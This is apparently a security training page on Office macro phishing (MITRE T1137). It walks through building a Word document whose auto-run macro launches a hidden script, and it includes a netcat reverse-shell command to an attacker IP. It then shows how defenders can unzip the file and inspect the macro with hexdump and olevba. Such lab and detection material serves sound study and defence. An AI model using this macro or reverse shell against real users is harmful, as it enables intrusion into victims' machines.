T1137: Phishing - Office Macros
Code execution with VBA Macros
This technique will build a primitive word document that will auto execute the VBA Macros code once the Macros protection is disabled.
- 1.Create new word document (CTRL+N)
- 2.Hit ALT+F11 to go into Macro editor
- 3.Double click into the "This document" and CTRL+C/V the below:
Private Sub Document_Open()
MsgBox "game over", vbOKOnly, "game over"
a = Shell("C:\tools\shell.cmd", vbHide)
C:\tools\nc.exe 10.0.0.5 443 -e C:\Windows\System32\cmd.exe
This is how it should look roughly in:
ALT+F11 to switch back to the document editing mode and add a flair of social engineering like so:
Save the file as a macro enabled document, for example a Doc3.dotm:
Dot3.dotm - Word Document with Embedded VBA Macros
Victim launching the Doc3.dotm:
...and enabling the content - which results in attacker receiving a reverse shell:
The below graphic represents the process ancestry after the victim had clicked the "Enable Content" button in our malicious Doc3.dotm document:
If you received a suspicious Office document and do not have any malware analysis tools, hopefully at least you have access to a WinZip or 7Zip and Strings utility or any type of Hex Editor to hand.
Since Office files are essentially ZIP archives (PK magic bytes):
...the file Dot3.dotm can be renamed to Doc3.zip and simply unzipped like a regular ZIP archive. Doing so deflates the archive and reveals the files that make up the malicious office document. One of the files is the
document.xmlwhich is where the main document body text goes and
vbaProject.bincontaining the evil macros themselves:
Additionally, if you have the strings or a hex dumping utility, you can pass the
vbaProject.binthrough it. This can sometimes give you as defender enough to determine if the document is suspicious/malicious.
hexdump -C vbaProject.binreveals some fragmented keywords that should immediately raise your suspicion - Shell, Hide, Sub_Open and something that looks like a file path:
If you have a malware analysis linux distro Remnux, you can easily inspect the VBA macros code contained in the document by issuing the command
olevba.py filename.dotm. As seen below, the command nicely decodes the
vbaProject.binand reveals the actual code as well as provides some interpretation of the commands found in the script: